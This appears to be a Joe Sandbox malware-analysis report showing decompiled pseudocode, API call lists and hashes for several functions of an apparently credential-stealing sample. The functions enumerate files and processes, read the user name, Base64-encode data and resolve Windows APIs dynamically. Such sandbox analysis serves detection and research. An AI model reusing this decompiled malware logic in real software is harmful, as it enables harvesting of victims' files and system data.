Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: d2b7c5d3cc1aaec4a3d9d2d878cc2af8ceb18105d949279e4cc5dce4bf6d7fef
Instruction ID: 3756993ddf7a0f07120ec2fb683c45b4ddb2db8b91290292c483787aba543401
Opcode Fuzzy Hash: d2b7c5d3cc1aaec4a3d9d2d878cc2af8ceb18105d949279e4cc5dce4bf6d7fef
Instruction Fuzzy Hash: 2E21E5B4900219BFDB009F94DC899EEBBB9FB08345F10846AF612A2390C6759A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407D25 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 414
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00407D25(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, char _a40, int _a52, intOrPtr _a56, intOrPtr _a60, char _a64) {
				intOrPtr _v12;
				char _v20;
				intOrPtr _v24;
				char _v32;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v84;
				char _v92;
				void* _v96;
				CHAR* _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				char _v240;
				char _v252;
				char _v264;
				char _v276;
				char _v288;
				char _v300;
				char _v312;
				char _v324;
				char _v336;
				char _v348;
				char _v360;
				char _v372;
				char _v384;
				char _v396;
				char _v408;
				char _v420;
				char _v432;
				char _v444;
				char _v456;
				struct _WIN32_FIND_DATAA _v776;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t164;
				int _t166;
				int _t168;
				int _t324;
				int _t337;
				int _t350;
				void* _t361;
				void* _t366;
				int _t377;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				void* _t449;
				void* _t450;
				void* _t451;
				void* _t452;
				void* _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				void* _t460;
				void* _t461;
				void* _t462;
				void* _t464;

				_t463 = __eflags;
				_t366 = __ecx;
				_t361 = 0x40fbe1;
				E0040EA50( &_v108, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B(E0040EB29( &_v108, _t366,  &_a28,  &_v80, __eflags), _t366,  &_v68, _t463, "\*.*"), _t366,  &_v108);
				E004016EF(_v68);
				E004016EF(_v80);
				_t164 = FindFirstFileA(_v108,  &_v776); // executed
				_v96 = _t164;
				_t464 = _t164 - 0xffffffff;
				while(_t464 != 0) {
					_t166 =  *0x613784( &(_v776.cFileName), 0x40fbf0);
					__eflags = _t166;
					if(_t166 != 0) {
						__eflags =  *0x613784( &(_v776.cFileName), 0x40fbf4);
						if(__eflags != 0) {
							E0040EAAB(_t366,  &_v20);
							E0040EAEF(E0040EB29(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29( &_v56, _t366,  &_a28,  &_v336, __eflags), _t366,  &_v192, __eflags, 0x40fbe4), _t366,  &_v20,  &_v432, __eflags), _t366,  &_v168, __eflags, 0x40fbe4), _t366,  &_v312, __eflags,  *0x61341c), _t366,  &_v144, __eflags, 0x40fbe4), _t366,  &_a4,  &_v360, __eflags), _t366,  &_v56);
							E004016EF(_v360);
							E004016EF(_v144);
							E004016EF(_v312);
							E004016EF(_v168);
							E004016EF(_v432);
							E004016EF(_v192);
							E004016EF(_v336);
							E0040EAEF(E0040EB6B(E0040EB6B( &_v56, _t366,  &_v408, __eflags, 0x40fbe4), _t366,  &_v216, __eflags,  *0x613514), _t366,  &_v92);
							E004016EF(_v216);
							E004016EF(_v408);
							E0040EAEF(E0040EB29(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29( &_v44, _t366,  &_a28,  &_v132, __eflags), _t366,  &_v384, __eflags, 0x40fbe4), _t366,  &_v20,  &_v288, __eflags), _t366,  &_v456, __eflags, 0x40fbe4), _t366,  &_v264, __eflags,  *0x613324), _t366,  &_v120, __eflags, 0x40fbe4), _t366,  &_a4,  &_v240, __eflags), _t366,  &_v44);
							E004016EF(_v240);
							E004016EF(_v120);
							E004016EF(_v264);
							E004016EF(_v456);
							E004016EF(_v288);
							E004016EF(_v384);
							E004016EF(_v132);
							E0040EAEF(E0040EB6B(E0040EB6B( &_v44, _t366,  &_v180, __eflags, 0x40fbe4), _t366,  &_v156, __eflags,  *0x613514), _t366,  &_v80);
							E004016EF(_v156);
							E004016EF(_v180);
							E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29( &_v32, _t366,  &_a28,  &_v396, __eflags), _t366,  &_v372, __eflags, 0x40fbe4), _t366,  &_v20,  &_v348, __eflags), _t366,  &_v324, __eflags, 0x40fbe4), _t366,  &_v300, __eflags,  *0x613100), _t366,  &_v276, __eflags, 0x40fbe4), _t366,  &_v252, __eflags,  *0x613014), _t366,  &_a4,  &_v228, __eflags), _t366,  &_v204, __eflags,  *0x61300c), _t366,  &_v32);
							E004016EF(_v204);
							E004016EF(_v228);
							E004016EF(_v252);
							E004016EF(_v276);
							E004016EF(_v300);
							E004016EF(_v324);
							E004016EF(_v348);
							E004016EF(_v372);
							E004016EF(_v396);
							E0040EAEF(E0040EB6B(E0040EB6B( &_v32, _t366,  &_v444, __eflags, 0x40fbe4), _t366,  &_v420, __eflags,  *0x613514), _t366,  &_v68);
							E004016EF(_v420);
							E004016EF(_v444);
							_t377 = 0;
							__eflags = _a52;
							if(__eflags != 0) {
								_t447 = _t444 - 0xc;
								E0040EA82( &_v92, _t366, _t447, __eflags); // executed
								_t350 = E0040D910(); // executed
								_t444 = _t447 + 0xc;
								__eflags = _t350;
								if(__eflags != 0) {
									_t448 = _t444 - 0x50;
									E00401581( &_a64, _t448);
									_push(0);
									_t449 = _t448 - 0xc;
									E0040EA82( &_v20, _t366, _t449, __eflags);
									_t450 = _t449 - 0xc;
									E0040EA82( &_a40, _t366, _t450, __eflags);
									_t451 = _t450 - 0xc;
									E0040EA82( &_a16, _t366, _t451, __eflags);
									_t452 = _t451 - 0xc;
									E0040EA82( &_v56, _t366, _t452, __eflags);
									E004078B3(_t366, __eflags);
									_t444 = _t452 + 0x84;
									_t377 = 0;
									__eflags = 0;
								}
							}
							__eflags = _a56 - _t377;
							if(__eflags != 0) {
								_t446 = _t444 - 0xc;
								E0040EA82( &_v80, _t366, _t446, __eflags); // executed
								_t337 = E0040D910(); // executed
								_t444 = _t446 + 0xc;
								__eflags = _t337;
								if(__eflags != 0) {
									_t453 = _t444 - 0x50;
									E00401581( &_a64, _t453);
									_push(1);
									_t454 = _t453 - 0xc;
									E0040EA82( &_v20, _t366, _t454, __eflags);
									_t455 = _t454 - 0xc;
									E0040EA82( &_a40, _t366, _t455, __eflags);
									_t456 = _t455 - 0xc;
									E0040EA82( &_a16, _t366, _t456, __eflags);
									_t457 = _t456 - 0xc;
									E0040EA82( &_v44, _t366, _t457, __eflags);
									E004078B3(_t366, __eflags);
									_t444 = _t457 + 0x84;
									_t377 = 0;
									__eflags = 0;
								}
							}
							__eflags = _a60 - _t377;
							if(__eflags != 0) {
								_t445 = _t444 - 0xc;
								E0040EA82( &_v68, _t366, _t445, __eflags); // executed
								_t324 = E0040D910(); // executed
								_t444 = _t445 + 0xc;
								__eflags = _t324;
								if(__eflags != 0) {
									_t458 = _t444 - 0x50;
									E00401581( &_a64, _t458);
									_push(2);
									_t459 = _t458 - 0xc;
									E0040EA82( &_v20, _t366, _t459, __eflags);
									_t460 = _t459 - 0xc;
									E0040EA82( &_a40, _t366, _t460, __eflags);
									_t461 = _t460 - 0xc;
									E0040EA82( &_a16, _t366, _t461, __eflags);
									_t462 = _t461 - 0xc;
									E0040EA82( &_v32, _t366, _t462, __eflags);
									E004078B3(_t366, __eflags);
									_t444 = _t462 + 0x84;
									_t377 = 0;
									__eflags = 0;
								}
							}
							E004016EF(_v20);
							_v20 = _t377;
							_v12 = _t377;
							E004016EF(_v56);
							_v56 = _t377;
							_v48 = _t377;
							E004016EF(_v92);
							_v92 = _t377;
							_v84 = _t377;
							E004016EF(_v44);
							_v44 = _t377;
							_v36 = _t377;
							E004016EF(_v80);
							_v80 = _t377;
							_v72 = _t377;
							E004016EF(_v32);
							_v32 = _t377;
							_v24 = _t377;
							E004016EF(_v68);
							_v68 = _t377;
							_v60 = _t377;
							E004016EF(0);
							E004016EF(0);
							E004016EF(0);
							E004016EF(0);
							E004016EF(0);
							E004016EF(0);
							__eflags = 0;
							E004016EF(0);
							_t361 = 0x40fbe1;
						}
					}
					_t168 = FindNextFileA(_v96,  &_v776); // executed
					__eflags = _t168;
				}
				E004016EF(_v108);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				E004016EF(_a40);
				return E00401562( &_a64);
			}

0x00407d25
0x00407d25
0x00407d31
0x00407d3a
0x00407d5d
0x00407d65
0x00407d6d
0x00407d7c
0x00407d82
0x00407d85
0x00408349
0x00407d99
0x00407d9f
0x00407da1
0x00407db9
0x00407dbb
0x00407e3e
0x00407ead
0x00407eb8
0x00407ec3
0x00407ece
0x00407ed9
0x00407ee4
0x00407eef
0x00407efa
0x00407f22
0x00407f2d
0x00407f38
0x00407f9c
0x00407fa7
0x00407faf
0x00407fba
0x00407fc5
0x00407fd0
0x00407fdb
0x00407fe3
0x0040800b
0x00408016
0x00408021
0x004080ad
0x004080b8
0x004080c3
0x004080ce
0x004080d9
0x004080e4
0x004080ef
0x004080fa
0x00408105
0x00408110
0x00408138
0x00408143
0x0040814e
0x00408153
0x00408155
0x00408158
0x0040815a
0x00408162
0x00408167
0x0040816c
0x0040816f
0x00408171
0x00408173
0x0040817b
0x00408180
0x00408182
0x0040818a
0x0040818f
0x00408197
0x0040819c
0x004081a4
0x004081a9
0x004081b1
0x004081b6
0x004081bb
0x004081c1
0x004081c1
0x004081c1
0x00408171
0x004081c3
0x004081c6
0x004081c8
0x004081d0
0x004081d5
0x004081da
0x004081dd
0x004081df
0x004081e1
0x004081e9
0x004081ee
0x004081f0
0x004081f8
0x004081fd
0x00408205
0x0040820a
0x00408212
0x00408217
0x0040821f
0x00408224
0x00408229
0x0040822f
0x0040822f
0x0040822f
0x004081df
0x00408231
0x00408234
0x00408236
0x0040823e
0x00408243
0x00408248
0x0040824b
0x0040824d
0x0040824f
0x00408257
0x0040825c
0x0040825e
0x00408266
0x0040826b
0x00408273
0x00408278
0x00408280
0x00408285
0x0040828d
0x00408292
0x00408297
0x0040829d
0x0040829d
0x0040829d
0x0040824d
0x004082a2
0x004082aa
0x004082ad
0x004082b0
0x004082b8
0x004082bb
0x004082be
0x004082c6
0x004082c9
0x004082cc
0x004082d4
0x004082d7
0x004082da
0x004082e2
0x004082e5
0x004082e8
0x004082f0
0x004082f3
0x004082f6
0x004082fd
0x00408300
0x00408303
0x0040830a
0x00408311
0x00408318
0x0040831f
0x00408326
0x0040832b
0x0040832d
0x00408332
0x00408332
0x00407dbb
0x00408341
0x00408347
0x00408347
0x00408352
0x0040835a
0x00408362
0x0040836a
0x00408372
0x00408383

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

FindFirstFileA.KERNEL32(?,?,\*.*,0040FBE1,004087B0,?,?), ref: 00407D7C
StrCmpCA.SHLWAPI(?,0040FBF0,?,?), ref: 00407D99
StrCmpCA.SHLWAPI(?,0040FBF4,?,?), ref: 00407DB3

Strings

\*.*, xrefs: 00407D3F

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: \*.*
API String ID: 2567437900-1173974218
Opcode ID: 65f5aae33ff58d55beb332decbaeb50f4b05a858591022623e5bde7b799eedf4
Instruction ID: 8ecfc16ad34b431edd1a9e5976e784785e09d8ea7b404d8d1e5741e9988b4fbc
Opcode Fuzzy Hash: 65f5aae33ff58d55beb332decbaeb50f4b05a858591022623e5bde7b799eedf4
Instruction Fuzzy Hash: CBF12E71D001288BCF10FBA6DD826DD77B5AF04308F4509BAB905B71A1DB396E5ACF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D6D2(void* __edi, void* __eflags) {
				char _v16;
				char _v28;
				char _v288;
				void* _v324;
				void* __esi;
				void* _t10;
				int _t12;
				void* _t28;
				void* _t29;
				void* _t30;

				_t30 = __edi;
				E0040EA50(__edi, __eflags, 0x40fbe1);
				_v324 = 0x128;
				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
				_t28 = _t10;
				_t12 = Process32First(_t28,  &_v324); // executed
				if(_t12 != 0) {
					while(Process32Next(_t28,  &_v324) != 0) {
						_t3 =  &_v28; // 0x412120
						E0040EAEF(E0040EB6B(_t30, _t29, _t3, __eflags, "\n\t"), _t29, _t30);
						_t4 =  &_v28; // 0x412120
						E004016EF( *_t4);
						_t6 =  &_v16; // 0x412120
						E0040EAEF(E0040EB6B(_t30, _t29, _t6, __eflags,  &_v288), _t29, _t30);
						_t7 =  &_v16; // 0x412120
						E004016EF( *_t7);
					}
				}
				FindCloseChangeNotification(_t28); // executed
				return _t30;
			}

0x0040d6d2
0x0040d6e4
0x0040d6ed
0x0040d6f7
0x0040d6fd
0x0040d707
0x0040d70f
0x0040d751
0x0040d718
0x0040d724
0x0040d729
0x0040d72c
0x0040d738
0x0040d744
0x0040d749
0x0040d74c
0x0040d74c
0x0040d751
0x0040d764
0x0040d76f

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D6F7
Process32First.KERNEL32(00000000,00000128), ref: 0040D707
Process32Next.KERNEL32(00000000,00000128), ref: 0040D759
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040D764

Strings

!A !A !A !A !A, xrefs: 0040D718, 0040D729

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcpy
String ID: !A !A !A !A !A
API String ID: 2551335554-2042661873
Opcode ID: 389d71d35718e021d17960c94a40cbf81c063d9b2e7537a38213413f50f1c4c4
Instruction ID: 54ffdacc84eed7c7ce742a71970c14c85ddf98ee1df862bd2a4ca4ed42da8ff9
Opcode Fuzzy Hash: 389d71d35718e021d17960c94a40cbf81c063d9b2e7537a38213413f50f1c4c4
Instruction Fuzzy Hash: 58016175A00114A7C711BB66DCC6BEE776DAB08304F040566F606B32D1D7789E058A99

Uniqueness

Uniqueness Score: -1.00%

Function 0040D983 Relevance: 6.0, APIs: 4, Instructions: 50
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D983(void* __ecx, DWORD* __esi, char** _a4, BYTE* _a8, int _a12) {
				signed int _v8;
				void* _v12;
				signed int _t15;
				char* _t17;
				char** _t28;

				if(_a8 != 0) {
					if(CryptBinaryToStringA(_a8, _a12, 0x40000001, 0, __esi) == 0) {
						L4:
						_t15 = 0;
					} else {
						_t17 = RtlAllocateHeap(GetProcessHeap(), 0,  *__esi); // executed
						_t28 = _a4;
						 *_t28 = _t17;
						if(_t17 != 0) {
							_v8 =  *__esi;
							_v12 = _t17;
							memset(_v12, 0, _v8 << 0);
							_t15 = CryptBinaryToStringA(_a8, _a12, 0x40000001,  *_t28, __esi) & 0xffffff00 | _t20 != 0x00000000;
						} else {
							goto L4;
						}
					}
				} else {
					_t15 = 0;
				}
				return _t15;
			}

0x0040d98e
0x0040d9ab
0x0040d9c6
0x0040d9c6
0x0040d9ad
0x0040d9b7
0x0040d9bd
0x0040d9c0
0x0040d9c4
0x0040d9cc
0x0040d9cf
0x0040d9da
0x0040d9ee
0x00000000
0x00000000
0x00000000
0x0040d9c4
0x0040d990
0x0040d990
0x0040d990
0x0040d9f4

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040D9A3
GetProcessHeap.KERNEL32(00000000,?,?,00403773,?,?,?,?,?,?,?), ref: 0040D9B0
RtlAllocateHeap.NTDLL(00000000,?,00403773), ref: 0040D9B7

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateBinaryCryptProcessString
String ID:
API String ID: 869800140-0
Opcode ID: 2c20f058364ce8882f639e585e69b0867305743557782725152201f0bc7b17f0
Instruction ID: 071f8bd7e4b608b96dabf24cdd2aac521a648a697ba274de69a2d18745146947
Opcode Fuzzy Hash: 2c20f058364ce8882f639e585e69b0867305743557782725152201f0bc7b17f0
Instruction Fuzzy Hash: 040152B1500208FFDF118F95DC448AB7BBAFF49360B149429F405D3250D7359951EB14

Uniqueness

Uniqueness Score: -1.00%

Function 004001F6 Relevance: 5.7, APIs: 1, Strings: 1, Instructions: 2158fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

FindFirstFileA.KERNEL32(?,?,0040FBE4,0040FBE4,0040FBE1,0040FBE1,?,?,?), ref: 00401132

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Strings

\*.*, xrefs: 0040106B

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
String ID: \*.*
API String ID: 3948427078-1173974218
Opcode ID: 266014399fb54856c7ed3312eec4fc21d672dd2476080800a43efce17d029c10
Instruction ID: c503705c3360d013a9a0b82304b9244ba5d307384d678f6242c7511bacaa0584
Opcode Fuzzy Hash: 266014399fb54856c7ed3312eec4fc21d672dd2476080800a43efce17d029c10
Instruction Fuzzy Hash: 32413C319092848FCB02EBA5CC964CD7FB1AE02314B1A45FBE541BB1E3D63C6D5ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D204 Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D204(void* __ecx) {
				long _v8;
				CHAR* _t10;

				_t10 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				GetUserNameA(_t10,  &_v8); // executed
				return _t10;
			}

0x0040d21d
0x0040d224
0x0040d22b
0x0040d235

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040D05B,0040FBE1), ref: 0040D210
RtlAllocateHeap.NTDLL(00000000), ref: 0040D217
GetUserNameA.ADVAPI32(00000000,?), ref: 0040D22B

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 4b0dc297bb684b6ec818a4f9c4497347e0a66c054c8955d1e6628e629a746559
Instruction ID: 8b3f1f8b7854cda921e7d41df7eddad92df97bb415b33366e2138df366df9aa1
Opcode Fuzzy Hash: 4b0dc297bb684b6ec818a4f9c4497347e0a66c054c8955d1e6628e629a746559
Instruction Fuzzy Hash: 59D05EF6200218BFDB009B95DC0DECABABDDB84B15F089156FA03D23A0DAF0DA008670

Uniqueness

Uniqueness Score: -1.00%

Function 0040E10B Relevance: 153.4, APIs: 102, Instructions: 438
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E10B() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;

				_t1 =  *0x613798; // 0x76670000
				if(_t1 != 0) {
					 *0x61365c = GetProcAddress(_t1,  *0x6134c0);
					 *0x6136d4 = GetProcAddress( *0x613798,  *0x61311c);
					 *0x613638 = GetProcAddress( *0x613798,  *0x6130d0);
					 *0x6137d0 = GetProcAddress( *0x613798,  *0x613104);
					 *0x6137b8 = GetProcAddress( *0x613798,  *0x613464);
					 *0x6135e4 = GetProcAddress( *0x613798,  *0x613130);
					 *0x613790 = GetProcAddress( *0x613798,  *0x6132dc);
					 *0x613778 = GetProcAddress( *0x613798,  *0x6130a4);
					 *0x6136f8 = GetProcAddress( *0x613798,  *0x613120);
					 *0x6136f4 = GetProcAddress( *0x613798,  *0x613164);
					 *0x6137f0 = GetProcAddress( *0x613798,  *0x613270);
					 *0x6137d4 = GetProcAddress( *0x613798,  *0x61351c);
					 *0x6135f0 = GetProcAddress( *0x613798,  *0x613228);
					 *0x6135d8 = GetProcAddress( *0x613798,  *0x6132d8);
					 *0x61366c = GetProcAddress( *0x613798,  *0x613468);
					 *0x613644 = GetProcAddress( *0x613798,  *0x6130ec);
					 *0x613658 = GetProcAddress( *0x613798,  *0x61332c);
					 *0x613678 = GetProcAddress( *0x613798,  *0x613430);
					 *0x613698 = GetProcAddress( *0x613798,  *0x61342c);
					 *0x613688 = GetProcAddress( *0x613798,  *0x613020);
					 *0x61369c = GetProcAddress( *0x613798,  *0x613410);
					 *0x6137e4 = GetProcAddress( *0x613798,  *0x613094);
					 *0x61361c = GetProcAddress( *0x613798,  *0x6131a0);
					 *0x613620 = GetProcAddress( *0x613798,  *0x61344c);
					 *0x613710 = GetProcAddress( *0x613798,  *0x6130e4);
					 *0x6135e8 = GetProcAddress( *0x613798,  *0x6133c8);
					 *0x613720 = GetProcAddress( *0x613798,  *0x61353c);
					 *0x61363c = GetProcAddress( *0x613798,  *0x613390);
					 *0x613684 = GetProcAddress( *0x613798,  *0x613414);
					 *0x613624 = GetProcAddress( *0x613798,  *0x61347c);
					 *0x6137f4 = GetProcAddress( *0x613798,  *0x6133ac);
					 *0x613634 = GetProcAddress( *0x613798,  *0x6132a8);
					 *0x613640 = GetProcAddress( *0x613798,  *0x6132f4);
					 *0x6135ec = GetProcAddress( *0x613798,  *0x613008);
					 *0x613730 = GetProcAddress( *0x613798,  *0x613368);
					 *0x6136f0 = GetProcAddress( *0x613798,  *0x6132b4);
					 *0x613610 = GetProcAddress( *0x613798,  *0x61349c);
					 *0x6137a4 = GetProcAddress( *0x613798,  *0x6131e8);
					 *0x613700 = GetProcAddress( *0x613798,  *0x6132e8);
					 *0x613724 = GetProcAddress( *0x613798,  *0x613320);
					 *0x613754 = GetProcAddress( *0x613798,  *0x613358);
				}
				_t2 = LoadLibraryA( *0x613298); // executed
				 *0x6136a4 = _t2; // executed
				_t3 = LoadLibraryA( *0x6134bc); // executed
				 *0x6136dc = _t3; // executed
				_t4 = LoadLibraryA( *0x613234); // executed
				 *0x61376c = _t4; // executed
				_t5 = LoadLibraryA( *0x61320c); // executed
				 *0x61364c = _t5; // executed
				_t6 = LoadLibraryA( *0x613418); // executed
				 *0x6136d0 = _t6; // executed
				_t7 = LoadLibraryA( *0x613160); // executed
				 *0x6137c0 = _t7; // executed
